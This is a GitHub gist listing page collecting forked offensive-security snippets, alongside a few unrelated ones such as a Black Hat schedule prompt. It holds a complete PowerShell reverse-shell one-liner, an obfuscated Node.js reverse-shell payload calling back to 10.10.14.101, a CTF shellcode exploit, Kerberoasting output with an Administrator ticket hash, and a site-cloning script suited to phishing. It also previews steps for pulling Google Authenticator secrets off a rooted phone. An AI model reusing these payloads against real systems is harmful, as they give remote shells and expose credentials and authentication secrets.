Skip to content

Instantly share code, notes, and snippets.

@Tobey123
Tobey123 / cloning.sh
Created September 6, 2023 03:24 — forked from Mr-Un1k0d3r/cloning.sh
Lazy website cloning
#!/bin/bash
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"
@Tobey123
Tobey123 / easyshellcode.py
Created September 3, 2023 11:32 — forked from lmt-swallow/easyshellcode.py
Contrail CTF 2019 (pokebattle, welcomechain, EasyShellcode, RaspiWorld)
# -*- coding: utf-8 -*-
from pwn import *
context.update(arch='amd64', os='linux')
host = '114.177.250.4'
port = 2210
s = remote(host, port)
shellcode = asm("""
mov rdi, [rax]

Parse JSON . I need a schedule table of all sessions, and if there are multiple sessions at the same time, they should be split into separate columns in a Markdown table.

The time slots should be displayed according to the time slots mentioned in the JSON.

The URL format is "https://www.blackhat.com/us-23/briefings/schedule/#"+title, with special characters and spaces replaced by hyphens, and followed by the ID. The session name should be extracted from the value of the 'title' field.

The table should be structured as follows, divided into different days:

Time 2023-08-09 Title1 Title2
@Tobey123
Tobey123 / report.py
Created July 3, 2023 06:05 — forked from Huntinex/report.py
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
@Tobey123
Tobey123 / resources.md
Created August 19, 2020 07:40 — forked from muff-in/resources.md
A curated list of Assembly Language / Reversing / Malware Analysis -resources

Assembly Language / Reversing / Malware Analysis -resources

Twitter: Muffin

⭐Assembly Language

./nodeshell.py 10.10.14.101 1337
[+] LHOST = 10.10.14.101
[+] LPORT = 1337
[+] Encoding
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,49,48,49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,9
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 14:06:40 2018-07-30 12:17:40
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$774aeb9123ec65e18f0ebc45cf191f38$7e82f02f5e6fe7e41804e185075f9a2662df9e9da73e6fa92dc50fff39ee67df5e0875f47d9615fa4f8f5c1a548bca9bace60cc6b4d3b0eeacb0512ed6453b4b2d29d35245a66da82152e37402c6480fec95c72603ddeb85311db2d14ecd56c441868b2a00246419b056916bcac714e99ea4b62091018ce1f051c5765046501add522d772a7418ab34d77bed74df8b94689cc226abede815d3dfa95c72835467adce02292ad4f0bfa31ad0da931268583199797ebc60c677b40b0506620ea9b932c343c5ba7f98923a18e9997192a1b1aaec16255e70483af797a3db40ce48d6bde6a5b733117
@Tobey123
Tobey123 / RS.ps1
Created July 5, 2019 03:36 — forked from ohpe/RS.ps1
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@Tobey123
Tobey123 / howto-recover-google-authenticator-keys.txt
Created June 25, 2019 06:10 — forked from jbinto/howto-recover-google-authenticator-keys.txt
Recovering Google Authenticator keys from Android device for backup
### Last tested February 7 2014 on a Galaxy S3 (d2att) running Cyanogenmod 11 nightly, with Google Authenticator 2.49.
### Device with Google Authenticator must have root.
### Computer requires Android Developer Tools and SQLite 3.
### Connect your device in USB debugging mode.
$ cd /tmp
$ adb root
$ adb pull /data/data/com.google.android.apps.authenticator2/databases/databases
@Tobey123
Tobey123 / makeqrs.py
Created June 25, 2019 06:09 — forked from naftulikay/makeqrs.py
Create QR Codes from a Google Authenticator SQLite Database
#!/usr/bin/env python2.7
import argparse
import os
import qrcode
import qrcode.image.pil
import sqlite3
import sys
import urllib